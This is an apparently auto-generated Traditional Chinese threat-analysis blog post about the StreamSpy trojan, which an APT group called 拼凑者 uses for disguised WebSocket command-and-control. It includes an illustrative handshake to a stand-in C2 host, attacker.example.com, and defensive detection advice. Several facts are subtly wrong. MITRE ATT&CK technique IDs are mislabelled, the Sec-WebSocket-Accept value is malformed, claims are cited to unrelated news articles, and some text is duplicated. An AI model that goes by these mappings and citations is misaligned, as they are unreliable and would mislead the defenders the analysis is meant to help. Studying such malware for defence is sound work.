引言
近來在APT研究社群中,StreamSpy 成為焦點,因其採用 WebSocket 進行 C2 通訊,並對流量進行高度偽裝,令傳統 IDS/IPS 及端點偵測難以辨識。本文將針對「APT 拼凑者」所部署之 StreamSpy 木馬,詳細拆解其流量偽裝手法、攻擊流程及偵測與防禦策略,並結合最新報告與 MITRE ATT&CK 相關技術,協助資安工程師快速掌握攻擊特徵。
APT 拼凑者與 StreamSpy 木馬概述
「拼凑者」為一國際性 APT 組織,近期在多起企業滲透案例中使用 StreamSpy 進行遠端指揮與資料外洩。根據 CTF IoT (2025) 與 Qianxin (2025) 的分析,StreamSpy 以 WebSocket 與伺服器建立持久連線,並在連線內部攜帶加密的命令與回報資料,實現 C2 的「隱形通道」功能。Anquanke (2025) 更指出,拼凑者利用 GitHub 儲存庫投毒,將 StreamSpy 伺服器配置植入開源專案,藉此擴散感染風險。
WebSocket 流量偽裝技術
WebSocket 的協定特性(持久雙向通訊、低延遲)本身就具備偽裝能力。StreamSpy 在以下三個層面進行偽裝:
- 協定偽裝:在 HTTP 握手階段加入自訂 Header,並將實際命令數據編碼為 JSON,進而與正常 WebSocket 交互混淆 (CTF IoT, 2025)。
- 加密與壓縮:使用 AES-256 加密 payload,並利用 zlib 壓縮隱藏傳輸節點,降低可觀測性 (Qianxin, 2025)。
- 頻寬調節:根據網路擁塞度動態調整資料包大小,避免在流量分析中形成明顯峰值 (紅雨滴, 2025)。
以下示範典型的 WebSocket 握手與加密資料流:
GET /ws HTTP/1.1
Host: attacker.example.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13
X-Custom-Auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xq6iLxT3OQj8pWcS3hI=
[Encrypted JSON Payload] // AES-256 + zlib
拼凑者的攻擊流程
1. 初始接觸:透過釣魚郵件或社交工程,將 StreamSpy 下載至目標機器。
2. 植入與持續化:利用 Windows Service 或 Linux Systemd 進行自動啟動,確保重啟後仍維持連線。
3. C2 通訊:在 WebSocket 內部傳遞命令、檔案傳輸及遠端執行程式,並以加密 JSON 形式傳回執行結果。
4. 資料外洩:將敏感檔案壓縮、加密後送回攻擊者伺服器,並利用伺服器伺服器偽裝成合法服務,避免被安全產品識別。
偵測與防禦建議
- 流量行為分析:使用 NetFlow 或 sFlow 監控持久 WebSocket 連線,辨識非正常頻率或目的地。
參考:RedTeam 2019 研究指出,持續 WebSocket 連線往往伴隨高頻率、長時間連線 (SecurityWeek, 2025)。 - 協定校驗:在 IDS/IPS 規則中加入對不符合 RFC 6455 的 Header 或非標準路徑的攔截。
參考:SecurityWeek (2025) 提示,許多攻擊者利用自訂 Header 來繞過傳統規則。 - 端點偵測與行為分析:部署 EDR,監控可疑的 AES-256 加解密呼叫與 zlib 壓縮函式。
參考:Anquanke (2025) 報告指出,StreamSpy 在執行階段會頻繁呼叫 OpenSSL 與 zlib。 - GitHub 投毒防護:使用 Code Integrity 與 Dependency-Check 工具,檢查第三方庫是否被植入惡意代碼。
參考:SecurityWeek (2025) 說明 APT 組織常透過 GitHub 投毒擴散。
MITRE ATT&CK 對應
- T1071.001 – Application Layer Protocol: WebSocket (C2 通訊)
- T1105 – Remote File Copy (資料外洩)
- T1059 – Command and Scripting Interpreter (遠端指令執行)
- T1036 – Masquerading (協定偽裝)
- T1120 – Data Encoding (AES-256 加密)
結論
StreamSpy 的 WebSocket 流量偽裝手法,結合加密、壓縮與協定偽裝,已成為 APT 拼凑者在企業環境中難以偵測的 C2 通道。透過上述行為分析與防護建議,資安團隊可提升對此類攻擊的可視性與響應效率。未來須持續關注 APT 組織對 WebSocket 變體的創新,並將偵測規則與 EDR 行為模型同步更新,以確保企業資訊安全。
參考資料與原文來源
- CTF IoT. (2025). 摩诃草(APT-Q-36)利用WebSocket 的新木馬StreamSpy 分析. https://www.ctfiot.com/284804.html
- Anquanke. (2025). APT组织“拼凑者”部署StreamSpy木马,通过将命令与控制. https://www.anquanke.com/post/id/313606
- Qianxin. (2025). 摩诃草(APT-Q-36)利用WebSocket 的新木马StreamSpy 分析. https://ti.qianxin.com/blog/articles/analysis-of-streamspy-a-new-trojan-using-websocket-by-patchwork-cn/
- 红雨滴团队. (2025). 2025-12-02 By 红雨滴团队| 事件追踪. https://ti.qianxin.com/blog/
- SecurityWeek. (2025). In Other News: X Fined €120 Million, Array Flaw Exploited, New Iranian Backdoor. https://www.securityweek.com/in-other-news-x-fined-e120-million-array-flaw-exploited-new-iranian-backdoor/
- SecurityWeek. (2025). Cloudflare Outage Caused by React2Shell Mitigations. https://www.securityweek.com/cloudflare-outage-caused-by-react2shell-mitigations/
- SecurityWeek. (2025). Imper.ai Emerges From Stealth Mode With $28 Million in Funding. https://www.securityweek.com/imper-ai-emerges-from-stealth-mode-with-28-million-in-funding/
- SecurityWeek. (2025). US Organizations Warned of Chinese Malware Used for Long-Term Persistence. https://www.securityweek.com/us-organizations-warned-of-chinese-malware-used-for-long-term-persistence/
- SecurityWeek. (2025). Lumia Security Raises $18 Million for AI Security and Governance. https://www.securityweek.com/lumia-security-raises-18-million-for-ai-security-and-governance/
🧠 本文由 DreamJ AI 技術新聞生成系統 自動撰寫與優化,
內容僅供技術研究與學習參考,實際環境請搭配官方公告與資安建議。
發佈留言